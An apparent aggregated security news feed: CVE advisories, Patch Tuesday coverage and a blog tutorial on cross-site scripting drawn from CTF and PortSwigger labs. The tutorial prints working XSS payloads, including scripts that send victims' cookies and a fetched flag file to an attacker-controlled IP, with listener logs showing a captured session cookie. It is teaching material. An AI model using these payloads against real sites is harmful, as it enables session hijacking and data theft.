by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-21331.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Office Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-21298.

by Zero Day Initiative Advisories

Company has issued patches for an unprecedented 159 CVEs, including eight zero-days, three of which attackers are already exploiting.

by Dark Reading

Microsoft today unleashed updates to plug a whopping 161 security vulnerabilities in Windows and related software, including three ""zero-day"" weaknesses that are already under active attack. Redmond''s inaugural Patch Tuesday of 2025 bundles more fixes than the company has shipped in one go since 2017.

by Krebs on Security

Microsoft has shed light on a now-patched security flaw impacting Apple macOS that, if successfully exploited, could have allowed an attacker running as ""root"" to bypass the operating system''s System Integrity Protection (SIP) and install malicious kernel drivers by loading third-party kernel extensions. The vulnerability in question is CVE-2024-44243 (CVSS score: 5.5), a medium-severity bug

by The Hacker News

New research has pulled back the curtain on a ""deficiency"" in Google''s ""Sign in with Google"" authentication flow that exploits a quirk in domain ownership to gain access to sensitive data. ""Google''s OAuth login doesn''t protect against someone purchasing a failed startup''s domain and using it to re-create email accounts for former employees,"" Truffle Security co-founder and CEO Dylan Ayrey said

by The Hacker News

The acquisition accelerates 1Password''s ongoing efforts to expand the role of the password manager with secure SaaS management.

by Dark Reading

Emergent macOS vulnerability lets adversaries circumvent Apple''s System Integrity Protection (SIP) by loading third-party kernels.

by Dark Reading

Security researchers say ""tens"" of Fortinet devices have been compromised so far as part of the weeks-long hacking campaign. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Two hacker groups were paid to develop malware targeting victims in the US, Europe, and Asia, as well as various Chinese dissident groups.

by Dark Reading

Microsoft has released its monthly security update for January of 2025 which includes 159 vulnerabilities, including 10 that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.”

by Cisco Talos Blog

Get all the details about how Uniqa Group AG was able to optimize employee productivity, improve employees’ daily experience, and boost overall security in this case study blog.

by Barracuda

Find out why unknown build assets is a growing problem and how Legit can help.

by Legit Security

Threat actors often use advanced phishing toolkits and Adversary-in-the-Middle (AitM) attacks in Business Email Compromise (BEC) campaigns, Discover how Darktrace detected and mitigated a sophisticated attack leveraging Dropbox, highlighting the importance of robust cybersecurity measures.

by Darktrace

What is XSS? A common client side vulnerability we often see is Cross Site Scripting (XSS), where we’re allowing the attacker to insert his malicious script on our webpages, targeting the users on those affected pages. These scripts are called in the victim’s browser that can then steal sensitive info like cookies, session tokens or even perform unauthorized action as the user performs. XSS attacks are brought about by failure to validate or sanitise user input, making this a devastating threat to web applications. Types of XSS There are several types of XSS, each with distinct behavior: Stored, Reflected, DOM based, and also a less well known variant which is Blind XSS. Stored XSS Persistent XSS (also known as stored XSS) is when the malicious payload is put on the server (usually a database) and delivered to the user when they access the bad page. It’s completely dangerous because every time the page is viewed the script runs, usually without the victim’s interaction. Reflected XSS When an attacker includes a malicious script inside a URL parameter and the parameter is reflected back to the user’s browser without being sanitized, that’s reflected XSS. The attack is social engineering and thus requires the attacker to trick the victim in clicking on crafted link to launch the attack. DOM-based XSS In a DOM based XSS, the malicious payload never reaches the server. The vulnerability, however, exists in the code the browser executes in JavaScript. Unsanitized user input is used to dynamically modify the Document Object Model (DOM) leading to XSS attack. Blind XSS A special type of Stored XSS is blind XSS, where the attacker’s payload is stored on the server but only a visible result is shown to an internal user (for example, an admin) who later views the script. The attacker does not immediately realize that the output of execution, and they do this by using tools to notify them when the payload triggers. One of the forms of XSS is particularly useful for poses where admin panels or internal dashboards are not exposed to the attackers in the first instance. Note that in all types of xss the payload might be same, but everything differs on how payload gets processed. If the input is saved server-side, it’s Stored XSS. If it’s immediately reflected back from the server, it’s Reflected XSS. If the input is processed and executed within the browser’s DOM without server interaction, it’s DOM-based XSS. Blind XSS: The payload is triggered in a different application or context (like an admin panel) where the attacker doesn’t see the immediate result. It often requires waiting for a privileged user to interact with the injected payload. Understanding Tags, Events, and Fuzzing Methodology in XSS Testing Cross Site Scripting (XSS) vulnerabilities are present when a user input is not sanitized properly, giving the attacker a chance to inject malicious scripts on a web page. A good way for identifying these vulnerabilities is to learn how the structure of the HTML tags, how the events, and doing fuzzing with the point of injection. Now the methodology is really simple, generally a pentester uses and tests for some html tags on various http headers and user input fields to see if get’s reflected on the webpage. Read that previous line couple of times till it sinks in and till we grasp the methodology. Now sometimes tags might be black listed and to trigger payload we might even need to include events along with tags to trigger some alert of javascript on the code. So we start with fuzzing for allowed tags and events on the webapp or webpage. This is a great way to start testing for xss. Now some of you might start thinking what if application blacklists any angular brackets, or filters brackets in that case we might need to encode angular brackets into something like html encoding. Don’t worry in the upcoming sections we will see how we can test for xss in great detail. You might want to bookmark the following websites for future reference on evading web application defences to execute our java script. https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html https://portswigger.net/web-security/cross-site-scripting/cheat-sheet Now in the third paragraph we mentioned about tags and events lets talk in detail about these topics. What Are Tags and Events in XSS? Tags: The basic building blocks of web pages are called HTML tags. Structure and content of a webpage; they define what a webpage will contain — text, images, links, and so on. Tags are enclosed within angle brackets (< >), for example: <b>: Makes text bold. <script>: Embeds JavaScript code. <img>: Displays an image. Since in the context of XSS tags are important since injecting new tags into a page can change its structure and behavior. As such we can add the <script> tag that will execute JavaScript code on another target page. Events: In HTML, events – also known as browser triggered or user interraction events – are events that a web page can respond to. Event attributes start with on and are attached to HTML elements to trigger JavaScript functions, such as: onclick: Called when an element is clicked onmouseover: When mouse hovers over an element. onload: This runs on load and will be triggered when an image or page load finishes. An XSS attack is commonly delivered via event handlers because it allows execution of JavaScript without new tags. For instance: <img src=""example.jpg"" onerror=""alert(''XSS'')""> Here, the onerror event executes an alert when the image fails to load. Methodology for Finding XSS by Fuzzing Tags and Events You should approach XSS vulnerabilities when testing for it, and you should do so systematically: Fuzz different tags and event handlers to see how the application reacts to those. Here’s a step-by-step methodology: Step 1: Basic Tags for Non Intrusive Testing So first, check if the application can accept HTML tags without encoding them. If you want to check if your input is rendered as HTML then use something simple such as <b> in your tag. Example: <b>This is a test for XSS</b> If the text is bold on the web page, it is likely that the application is not encoding e.g. < and > special characters, and that is a good starting point. Use the [portswigger xss cheat sheet](https:fuzz for input (see //portswigger.net/web-security/cross-site-scripting/cheat-sheet Step 2: Testing Common Event Handlers Further on, you should try adding event handlers to already created HTML elements. For example: <img error=""alert(''XSS'')""> If an alert box appears, then the application is vulnerable to event based XSS attacks. Now we can use the same cheat sheet to fuzz events. Step 3: Using Fuzzing with Various Tags and Events and generate your own payload. So use list of tags and events from resources like OWASP’s XSS filter evasion cheatsheet or PortSwigger’s XSS cheatsheet. Test different combinations of: Tags: <script>, (<img>, (<iframe>), etc. Events: for example, onclick, onmouseover, onload, etc. If you know something about javascript then this is possible, if you create through the tags and/or events or basically, if you google for payloads or just use any of your favourite AI tool like chatgpt, claude, etc to create payloads with the tags and events the web application is consuming. Step 4: Analyzing the Response if you are just injecting a payload analyse how the application processes it and very important to make sure payload works as intended and check it is a stored xss, or reflected xss. Stored XSS means if, the XSS is persisting on the website each time you visit the same website a reason and reflected xss if it is not. Reference: DO NOT USE alert(1) for XSS Finally it’s time to see the next XSS security mistake: alert(1) is outdated and senseless without context. The payload may be sandboxed to only have enough impact into modern app. Instead, use functions like alert(document.domain), console.log(window.origin), or fetch(''https:To understand the vulnerability’s scope it can be understood by replacing yourserver.com with //yourserver.com/?c='' + document.cookie. DOM Based XSS tests for your script that can manipulate or extract sensitive data are through window.location, localStorage or document.body.innerHTML. It’s not about just triggering a popup, proving an XSS vulnerability requires showing the real security impact – stealing session cookies, getting on to the restricted domains, or modifying the page itself. Source: Some XSS testing methodologies and payloads that I got to learn from CTFs 1. Stealing cookie with xss I across this technique while doing a retired hackthebox called headless, in which we steal the admin cookie, and to do this if we try and inject javascript code at any part of the input field, then it gets blacklisted, but if we inject xss via http headers we are able to trigger xss. We will be using the following payload to trigger xss payload .Make sure to replace your IP in this script which you can find using ifconfig command in linux. <script>var i=new Image(); i.src=""http://10.10.14.6/?c=""+document.cookie;</script> Now make sure before you send this payload to the web application your python local server is listening on your desired port so that we get the connection back. python -m http.server 80 Now we get admin user’s cookie which we can use to steal the session. HTTP/1.1"" 200 - 10.10.11.8 - - [11/Jul/2024 14:57:33] ""GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1"" 200 - 10.10.11.8 - - [11/Jul/2024 14:57:35] ""GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1"" 200 - 2.Blind XSS or Using XSS to fetch files Approach 1: We can use python script created by Tyler Ramsbey to fetch the file from remote website that is vulnerable to XSS. You can get the python script from here Now download and save this python script. Now use the following command to create an malicious script.js which we will use against the webserver. sudo python3 xss-extract.py -d /flag.txt -i 10.17.26.83:8000 Make sure that you are entering your tryhackme IP address, here I have used mine. Now before you send this payload directly you copy paste but we will make the server call back to us, that we can can see the server’s response. Note that unlike reflected XSS we won’t be able to see any response directly but if we set up python server or netcat listener we should be able to get response. So let’s do that. sudo python3 -m http.server Now use the following payload in the feedback section and check your python server if you have done everything correctly then you should get your /flag.txt file from the website. /home/mccleod/tools via  via 🐍 v3.8.10 took 1m42s ❯ python3 -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... 10.10.53.74 - - [14/Jan/2025 00:05:08] ""GET /?c=THM{83789a69074f636f64a38879cfcabe8b62305ee6} HTTP/1.1"" 200 - 10.10.53.74 - - [14/Jan/2025 00:05:08] ""GET /?c=TypeError:%20Failed%20to%20fetch HTTP/1.1"" 200 - 10.10.53.74 - - [14/Jan/2025 00:05:18] ""GET /?c=THM{83789a69074f636f64a38879cfcabe8b62305ee6} HTTP/1.1"" 200 - 10.10.53.74 - - [14/Jan/2025 00:05:19] ""GET /?c=TypeError:%20Failed%20to%20fetch HTTP/1.1"" 200 - ^C Keyboard interrupt received, exiting. Approach 2: We can use img tag payload to ex-filtrate or steal the file from the website Payload: <img src=""x"" onerror=""fetch(''http://127.0.0.1:8080/flag.txt'').then(r => r.text()).then(r => fetch(''http://10.17.123.199:8080/?c='' + r)).catch(e => fetch(''http://10.17.123.199:8080/?c='' + e))""/> Now make sure you are running your python server on the backend and you should get the flag. Explanation: The payload first attempts to fetch the contents of http://127.0.0.1:8080/flag.txt, where the flag is likely stored. It then sends the contents (or any error) to the attacker’s server at http://10.11.116.53:8080, appending the response as a query parameter (?c=<response>). This ensures that, if the fetch request is successful, the contents of the flag.txt file will be exfiltrated to our server. After submitting this payload, monitor your listener server for any incoming connections containing the flag. Credits - Jay Batt If you are more interested to set up your own server and want to test real world websites for blind xss then I highly recommend reading this blog by intigriti 3. XSS to SSRF This is very simple and yet effective we can use iframe by which we can embded another html document within a parent page. With this we can try and access internal website pages, and it works. A good friend of mine goodfella made writeup in detail where we use this payload to solve and get the flag if you are interested in this room then check it out here. Payload: <iframe src=""http://localhost:5000/admin""></iframe> 4. Dom XSS Link to the lab- https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink This lab shows a DOM based Cross-Site Scripting (DOM XSS) vulnerability on a web application that incorporates user input from the URL query parameter (location.search) via the document.write sink. An attacker can get the victim contain malicious payloads, running arbitrary Javascript inside the victim’s browser. In this lab, we successfully exploited the vulnerability using the payload: ""><svg onload=alert(1)> What is DOM XSS? DOM XSS occurs when JavaScript within the browser is used to parse and execute malicious user input which does not communicate with the server. DOM XSS is different from reflected or stored XSS; rather, DOM XSS is a result of client side manipulation of the DOM (Document Object Model). In particular, user controlled data flows from a source (e.g. window.location, document.cookie) to a sink (e.g. innerHTML, document.write), in a dangerous way. To understand DOM-based XSS, it’s crucial to grasp a few core concepts: Source: It is the origin of untrusted input in the client side code, window.location,document.cookie or localStorage. Sink: Where the execution of the javascript code occurs, and often if the input is not sanitised it could lead to XSS. Some of the vulnerable JS functions are innerHTML, eval(), or document.write(). DOM: Programmer interface to HTML and XML documents. It is the structure of a web page that script can use to update the content and structure live. Key Features of DOM XSS: Client-Side Execution: The browser does all of the payload processing. No Server-Side Reflection: The server doesn’t send the malicious input in its response. Sources and Sinks: Unsafe sources (user controlled inputs) and sinks (functions or methods which modify DOM) cause vulnerabilities. Approach 1: Manual Method Identifying Source and Sink Source The source in this lab is location.search, which represents the query string from the URL. var query = (new URLSearchParams(window.location.search)).get(''search''); This code snippet gets direct user input from the search parameter in the URL query string. Sink The sink in our lab is document.write, which writes HTML directly to the DOM. This sink is used in the following function: function trackSearch(query) { document.write(''<img src=""/resources/images/tracker.gif?searchTerms='' + query + ''"">''); } The unsanitized user input (query) is concatenated into the HTML and written into the DOM, creating a vulnerable injection point. Steps to Identify and Exploit DOM XSS We can identify Dom XSS by reading the client side code of the web app, or by visting chrome or browser dev tools. One the first glances we get a look at javascript code. 1. Identify the Source: Use browser developer tools to inspect the JavaScript code. Look for user-controlled inputs like window.location, document.cookie, or localStorage. 2. Trace the Data Flow: Follow how data moves from the source to the sink. Tools like Chrome DevTools’ “Sources” tab or Burp Suite can help trace the execution flow. 3. Find the Sink: Look for functions like document.write, innerHTML, eval, or setTimeout. Verify if user input is concatenated or directly injected into these methods. 4. Craft a Payload: Use a payload specific to the context (e.g., breaking out of quotes or tags). Test with harmless payloads like <svg onload=alert(1)> to confirm the vulnerability. Feel free to explore many other labs on reflected, stored, and DOM XSS on portswigger. Exploiting DOM XSS To exploit this vulnerability, our goal is to inject malicious content into the query parameter and have it executed by the document.write sink. Injection Context: Analyze where the input is injected into the DOM. Here, it is injected into the src attribute of an image tag (<img>). Breaking the Context: Use a payload that escapes the current HTML attribute and introduces new malicious content. For this lab, the working payload is: ?search=""><svg onload=alert(1)> "">: Breaks out of the src attribute and closes the <img> tag. <svg onload=alert(1)>: Injects a new <svg> tag with an onload event that executes JavaScript. Full Exploit URL: http://example.com/?search=""><svg onload=alert(1)> When this payload is processed, the resulting DOM contains the injected <svg> tag, which executes the JavaScript, triggering the alert(1). Approach 2: Using DOM INVADER DOM Invader is an chromium browser plugin developed my portswigger to find xss vulnerability inside a DOM of an web application. Setting Up DOM Invader Enable DOM Invader in Burp Suite: Go to the “Extensions” tab in Burp Suite, and ensure that DOM Invader is enabled.. Activate DOM Invader: In the browser, you’ll see a DOM Invader widget on supported pages. In your case you might not need to turn on postmessage interception Now access the lad, and right click and click inspect and click on the DOM INVADER section on that you will get an value to check, make sure first you copy the qeury and paste it onto the search. Now as soon as you paste then you will an pop-up form DOM INVADER saying it found an exploit and if we click exploit it will open new tab which solves the lab for us. Now we have exploited DOM XSS using DOM INVADER and we have solved the lab. XSS Mitigation Image Credits - Integriti Cross Site Scripting (XSS) vulnerabilities arise when untrusted user input is displayed by the browser in the browser and fired malicious code. There are three common types: The second type of XSS involves input reflecting back from the server immediately (reflected XSS), user input stored and later displayed to other users (stored XSS), and the third type of XSS wherein no server interaction is required and the input executes entirely within the browser DOM (DOM-based XSS). Mitigating XSS involves a combination of secure coding practices and browser-level defenses: 1. Sanitization: All user data is sanitized to prevent malicious code execution, and then filtered and encoded. 2. HTTPOnly Cookies: To reduce the chance of theft via XSS, mark your cookies as HTTPOnly. 3. CSP (Content Security Policy): CSP is used to constrain on which scripts the browser is able to run (thus redirecting XSS attack vectors). 4. Security Headers: Browsers won’t be able to execute untrusted code if you set set headers such as X-XSS-Protection and Content-Type Options. Obviously now if you are writing the pentest report you can’t possibly brush it on the surface and move on, now you need to deep dive into the technical part and provide technical remediation. In such situations knowing a BIT of javascript can be a lot helpful and as always you can refer to owasp mitigation XSS cheat sheet) A note to remember Finally always remember XSS without having an strong impact is just another feature not a bug!!! From developer point of view it might be just an web application feature where you performed some cool tricks like alert, unless you have very strong impact, your bug will not be classified into an bug. The struggle does not end here, if you can inject XSS into input field it’s just another self-xss you must be able to deliver it to client via something like URL which you can use some javascript to chain it from self xss to something more meaningful and impactful. Do the learning does not stop here and it takes a lot of struggle and pain to produce an high priority XSS bug. Finally I leave you with some more blogs to understand and explore XSS. Some blog on XSS to improve understanding: Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

by HACKLIDO

The integration of AI with SQL is transforming data management, providing deeper insights, automating more mundane tasks, and improving user experiences.

by ITPro Today

In late November and December 2024, Arctic Wolf observed evidence of a mass compromise of Fortinet FortiGate. While the initial attack vector was unknown at the time, evidence of compromise (with new users and SSL profiles) was consistent across compromised devices.

by SpiderLabs Blog

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to PowerShell Environment Variables Environment variables are predefined variables in an operating system, they are available in the form of key-value pairs which store important system-level or user-specific information, such as paths, user configurations, and system settings. These variables are accessible in PowerShell scripts and sessions, playing a significant role in tasks like configuring … Continued

by Netwrix

Welcome to the first Patch Tuesday of the new year. Even while preparing for Pwn2Own Automotive, the second Tuesday still brings with it a bevy of security updates from Adobe and Microsoft. Take a break from avoiding your New Year’s resolutions and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for January 2025For January, Adobe released five bulletins addressing 14 CVEs in Adobe Photoshop, Substance 3D Stager, Illustrator on iPad, Animate, and Substance 3D Designer. One of these bugs was reported through the Trend ZDI program. The patch for Substance 3D Stager is the largest with five Critical-rated bugs being fixed. The worst could lead to arbitrary code execution. The fix for Photoshop is also rated Critical and could result in code execution when opening malicious files. That’s also true for the patch for Adobe Illustrator on iPad. Note that this is specifically the iPad version and not the desktop version, which is interesting. The update for Substance 3D Designer addresses four Critical-rated bugs, all of which could lead to arbitrary code execution. Lastly, the patch for Adobe Animate fixes a single code execution bug.    None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.Microsoft Patches for January 2025This month, Microsoft released 159(!) new CVEs in Windows and Windows Components, Office and Office Components, Hyper-V, SharePoint Server, .NET and Visual Studio, Azure, BitLocker, Remote Desktop Services, and the Windows Virtual Trusted Platform Module. Three of these were submitted through the Trend ZDI program. With the addition of the third-party CVEs, the entire release tops out at 161 CVEs.Of the patches released today, 11 are rated Critical, and the other 148 are rated Important in severity. This is the largest number of CVEs addressed in any single month since at least 2017 and is more than double the usual amount of CVEs fixed in January. This comes on the heels of a record number of December patches and could be an ominous sign for patch levels in 2025. It will be interesting to see how this year shapes up.Five of these bugs are listed as publicly known, and three are listed as under active attack at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bugs currently being exploited:-       CVE-2025-21333/CVE-2025-21334/CVE-2025-21335 - Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege VulnerabilityThese three bugs are listed as under active attack, and all have the same description. An authenticated user could use these to execute code with SYSTEM privileges. Although not specified, I would think that if the attacker were executing code at SYSTEM on the hypervisor from a guest, the CVSS would indicate a scope change. Microsoft doesn’t list that, but I’ve disagreed with their CVSS ratings in the past. If you are running Hyper-V, make sure these patches are at the top of your list for testing and deployment. -       CVE-2025-21298 - Windows OLE Remote Code Execution VulnerabilityThis bug rates a CVSS 9.8 and allows a remote attacker to execute code on a target system by sending a specially crafted mail to an affected system with Outlook. Fortunately, the preview pane is not an attack vector, but previewing an attachment could trigger the code execution. The specific flaw exists within the parsing of RTF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. As a mitigation, you can set Outlook to read all standard mail as plain text, but users will likely revolt against such a setting. The best option is to test and deploy this patch quickly.-       CVE-2025-21295 - SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution VulnerabilityBesides being a mouthful of a title, this bug impacts a security mechanism, which is never a good sign. It allows remote, unauthenticated attackers to execute code on an affected system without user interaction. The only good news is that there are some barriers to exploitation, but I wouldn’t rely on that fact. I would also consider this a Scope Change, but that’s splitting hairs at this point. Even if you don’t rely on the negotiation mechanism, I wouldn’t wait to test and deploy this patch.-       CVE-2025-21297/CVE-2025-21309 - Windows Remote Desktop Services Remote Code Execution VulnerabilityBoth of these bugs allow arbitrary code execution on affected Remote Desktop Gateway servers from remote, unauthenticated attackers. They just need to connect to the server and trigger a race condition to create a use-after-free bug. While race conditions are somewhat tricky to exploit, we see them used at Pwn2Own frequently. Considering that exploiting this requires no user interaction, I would prioritize this patch, especially if you have these gateways exposed to the Internet.-       CVE-2025-21308 - Windows Themes Spoofing VulnerabilityThis is one of the five publicly known vulnerabilities receiving fixes this month, and for a change, we know where this one is exposed publicly. It turns out that a previous patch (CVE-2024-38030) could be bypassed. The spoofing component here is NTLM credential relaying. Consequently, systems with NTLM restricted are less likely to be exploited. At a minimum, you should be restricting outbound NTLM traffic to remote servers. Fortunately, Microsoft provides guidance on setting this up. Enable those restrictions then patch your systems.Here’s the full list of CVEs released by Microsoft for January 2025: CVE Title Severity CVSS Public Exploited Type CVE-2025-21333 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-21334 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-21335 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-21186 Microsoft Access Remote Code Execution Vulnerability Important 7.8 Yes No RCE CVE-2025-21366 Microsoft Access Remote Code Execution Vulnerability Important 7.8 Yes No RCE CVE-2025-21395 Microsoft Access Remote Code Execution Vulnerability Important 7.8 Yes No RCE CVE-2025-21275 Windows App Package Installer Elevation of Privilege Vulnerability Important 7.8 Yes No EoP CVE-2025-21308 Windows Themes Spoofing Vulnerability Important 6.5 Yes No Spoofing CVE-2025-21380 Azure Marketplace SaaS Resources Information Disclosure Vulnerability Critical 8.8 No No Info CVE-2025-21296 BranchCache Remote Code Execution Vulnerability Critical 7.5 No No RCE CVE-2025-21294 Microsoft Digest Authentication Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-21385 Microsoft Purview Information Disclosure Vulnerability Critical 8.8 No No Info CVE-2025-21295 SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-21178 Visual Studio Remote Code Execution Vulnerability Critical 8.8 No No RCE CVE-2025-21311 Windows NTLM V1 Elevation of Privilege Vulnerability Critical 9.8 No No EoP CVE-2025-21298 Windows OLE Remote Code Execution Vulnerability Critical 9.8 No No RCE CVE-2025-21307 Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability Critical 9.8 No No RCE CVE-2025-21297 Windows Remote Desktop Services Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-21309 Windows Remote Desktop Services Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-21172 .NET and Visual Studio Remote Code Execution Vulnerability Important 7.5 No No RCE CVE-2025-21173 .NET Elevation of Privilege Vulnerability Important 8 No No EoP CVE-2025-21171 .NET Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2025-21176 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21293 Active Directory Domain Services Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2025-21193 Active Directory Federation Server Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2024-7344 * Cert CC: CVE-2024-7344 Howyar Taiwan Secure Boot Bypass Important 6.7 No No SFB CVE-2025-21338 GDI+ Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-50338 * GitHub: CVE-2024-50338 Malformed URL allows information disclosure through git-credential-manager Important 7.4 No No Info CVE-2025-21326 Internet Explorer Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21231 IP Helper Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21189 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21219 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21268 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21328 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21329 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21332 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-21360 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21315 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21372 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21281 Microsoft COM for Windows Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21304 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21354 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21362 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21364 Microsoft Excel Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2025-21230 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21251 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21270 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21277 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21285 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21289 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21290 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21220 Microsoft Message Queuing Information Disclosure Vulnerability Important 7.5 No No Info CVE-2025-21223 Microsoft Message Queuing Information Disclosure Vulnerability Important 7.5 No No Info CVE-2025-21402 Microsoft Office OneNote Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21365 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21346 † Microsoft Office Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2025-21345 Microsoft Office Visio Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21356 Microsoft Office Visio Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21357 Microsoft Outlook Remote Code Execution Vulnerability Important 6.7 No No RCE CVE-2025-21361 Microsoft Outlook Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21187 Microsoft Power Automate Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21344 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21348 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2025-21393 Microsoft SharePoint Server Spoofing Vulnerability Important 6.3 No No Spoofing CVE-2025-21363 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21403 On-Premises Data Gateway Information Disclosure Vulnerability Important 6.4 No No Info CVE-2025-21211 Secure Boot Security Feature Bypass Vulnerability Important 6.8 No No SFB CVE-2025-21213 Secure Boot Security Feature Bypass Vulnerability Important 4.6 No No SFB CVE-2025-21215 Secure Boot Security Feature Bypass Vulnerability Important 4.6 No No SFB CVE-2025-21405 Visual Studio Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-21210 Windows BitLocker Information Disclosure Vulnerability Important 4.2 No No Info CVE-2025-21214 Windows BitLocker Information Disclosure Vulnerability Important 4.2 No No Info CVE-2025-21271 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21272 Windows COM Server Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21288 Windows COM Server Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21207 Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21336 Windows Cryptographic Information Disclosure Vulnerability Important 5.6 No No Info CVE-2025-21378 Windows CSC Service Elevation of Privilege Vulnerability Important 7.8 No No Info CVE-2025-21374 Windows CSC Service Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21227 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21228 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21229 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21232 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21249 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21255 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21256 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21258 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21260 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21261 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21263 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21265 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21310 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-21324 Windows Digital Media Elevation of Privilege Vulnerability Important 6.6 